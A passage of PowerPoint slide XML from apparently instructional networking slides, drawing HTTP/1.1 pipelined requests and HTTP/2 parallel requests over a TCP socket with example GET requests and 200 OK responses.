              <a:ext cx="2484976" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /baz.html HTTP/1.0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="82" name="Group 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{369FBE99-A47A-B691-AADA-AF953D57B500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="6164165"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="83" name="Straight Arrow Connector 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F5FE5AC-CDDF-BDE6-4A4E-66FA1666C22D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="3774593"/>
              <a:ext cx="524279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3F8BDFA9-F980-80A3-D616-82BBD7734DBC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362946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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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right)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="79"/>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wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="3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DB1F01C-30E8-1DC2-335C-5986F1C3371F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3175200" y="1643425"/>
            <a:ext cx="5688000" cy="5038175"/>
            <a:chOff x="3175200" y="916225"/>
            <a:chExt cx="5688000" cy="5038175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30446552-F7FA-FCA2-9BE4-DB38625E9E57}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3175200" y="1296000"/>
              <a:ext cx="5688000" cy="46584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D0EA90-31CB-12CC-EC23-45D16D041A2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5375856" y="916225"/>
              <a:ext cx="1308756" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>TCP Socket</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766342" y="1775023"/>
            <a:ext cx="2094335"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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9282589" y="1771867"/>
            <a:ext cx="2094335"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="2163791"/>
            <a:ext cx="5250715" cy="698508"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="698508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812374" y="4062495"/>
              <a:ext cx="5250715" cy="2378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64425" y="3387776"/>
              <a:ext cx="2435026" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /foo.html HTTP/1.0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Connection: keep-alive</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="2921203"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="3774593"/>
              <a:ext cx="524279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175" y="1498497"/>
            <a:ext cx="1005227" cy="100522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1768" y="1610278"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED7A7F6-2BF2-7BCF-FA99-CEF78EB706F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203200" y="228600"/>
            <a:ext cx="117856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a:t>Review: HTTP 1.1 Pipelined Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C0BF76-740A-492A-38A2-AB1A92306BCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="3672354"/>
            <a:ext cx="5250715" cy="698508"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="698508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Straight Arrow Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9814B8FB-6D30-DB51-760D-F5F313165822}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812374" y="4062495"/>
              <a:ext cx="5250715" cy="2378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1D89C94-6B93-46CD-65E5-198E85C4D431}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5164425" y="3387776"/>
              <a:ext cx="2435026" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /bar.html HTTP/1.0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Connection: keep-alive</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25AB7BA1-9060-5D47-C29E-97C051F8C771}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="4429766"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Arrow Connector 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09737B5A-5189-2E4F-1A70-1AAC94040163}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="3774593"/>
              <a:ext cx="524279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4EEB809-2B63-041D-628D-147BEFC36B72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF44EF3-C3A8-AC61-F005-323FA6C7801C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="5188117"/>
            <a:ext cx="5250715" cy="698508"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="698508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Arrow Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D7EC7F-9947-65C7-0B61-4E583DDA00B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812374" y="4062495"/>
              <a:ext cx="5250715" cy="2378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BC1D00F-B4DA-3D29-50B4-D1B971D88C3B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5164425" y="3387776"/>
              <a:ext cx="2484976" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /baz.html HTTP/1.0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Connection: keep-alive</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D78A6BD9-BFF0-6F82-82C4-EC72868621EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="5945529"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Straight Arrow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84B10A7A-0766-12A5-C2A2-D49BA774FACA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="3774593"/>
              <a:ext cx="524279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BF65AF5-31CF-2751-E912-FE31E7B18AD7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5477844" y="3387776"/>
              <a:ext cx="1808188" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HTTP/1.1 200 OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85038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DB1F01C-30E8-1DC2-335C-5986F1C3371F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1425600" y="2488956"/>
            <a:ext cx="9122400" cy="4005444"/>
            <a:chOff x="1425600" y="784312"/>
            <a:chExt cx="9122400" cy="5170088"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30446552-F7FA-FCA2-9BE4-DB38625E9E57}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1425600" y="1296000"/>
              <a:ext cx="9122400" cy="46584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4D0EA90-31CB-12CC-EC23-45D16D041A2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5332422" y="784312"/>
              <a:ext cx="1308756" cy="516448"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>TCP Socket</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766342" y="1775023"/>
            <a:ext cx="2094335"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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9282589" y="1771867"/>
            <a:ext cx="2094335"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1749600" y="3135791"/>
            <a:ext cx="8409600" cy="424410"/>
            <a:chOff x="2132743" y="3416576"/>
            <a:chExt cx="8409600" cy="424410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2132743" y="3802885"/>
              <a:ext cx="8409600" cy="3810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64425" y="3416576"/>
              <a:ext cx="2872646" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HEADER GET /foo.html ID: 1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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175" y="1498497"/>
            <a:ext cx="1005227" cy="100522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1768" y="1610278"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED7A7F6-2BF2-7BCF-FA99-CEF78EB706F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203200" y="228600"/>
            <a:ext cx="117856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a:t>HTTP 2 Parallel Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C55EE061-1DAE-7635-ECF4-874BAD745EF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1749600" y="3643262"/>
            <a:ext cx="8409603" cy="424410"/>
            <a:chOff x="2132743" y="3416576"/>
            <a:chExt cx="8409603" cy="424410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31" name="Straight Arrow Connector 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235498F4-8F30-1740-1988-9BAD542EDD6C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2132743" y="3802885"/>
              <a:ext cx="8409603" cy="38101"/>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F2A1304-3013-D425-149B-3F7902D6B39B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5164425" y="3416576"/>
              <a:ext cx="2874890" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HEADER GET /bar.html ID: 3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23CAF638-B8DC-0907-2EF1-F429D444E612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1749600" y="4137667"/>
            <a:ext cx="8409603" cy="424410"/>
            <a:chOff x="2132743" y="3416576"/>
            <a:chExt cx="8409603" cy="424410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="Straight Arrow Connector 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC65B256-F581-05B6-9A4B-89293B0A3797}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2132743" y="3802885"/>
              <a:ext cx="8409603" cy="38101"/>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16ECE2B-1F1E-D21F-FA71-64320E309A68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5164425" y="3416576"/>
              <a:ext cx="2922595" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HEADER GET /baz.html ID: 5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Straight Arrow Connector 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EDAD48F-BCB4-410E-26AB-0D8EA2C211DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1749600" y="5244088"/>
            <a:ext cx="8294400"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48CB791-66CD-D974-9F1E-1B462EFC5ABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1749600" y="5554888"/>
            <a:ext cx="8294400"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6FEE78E-087F-ECB1-407F-32898C44BDDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1749600" y="5894488"/>
            <a:ext cx="8294400"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4A269CB8-D7C5-66CF-60D1-5CD20277AB9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354400" y="4902088"/>
            <a:ext cx="1030082" cy="118799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t>HEADER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ID: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC2BF40-87E7-58C4-42AF-56FC8F4A0C69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454010" y="4902088"/>
            <a:ext cx="1030082" cy="118799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t>HEADER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ID: 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rectangle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02251E53-332F-F0A4-FE82-C25F3E8036F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
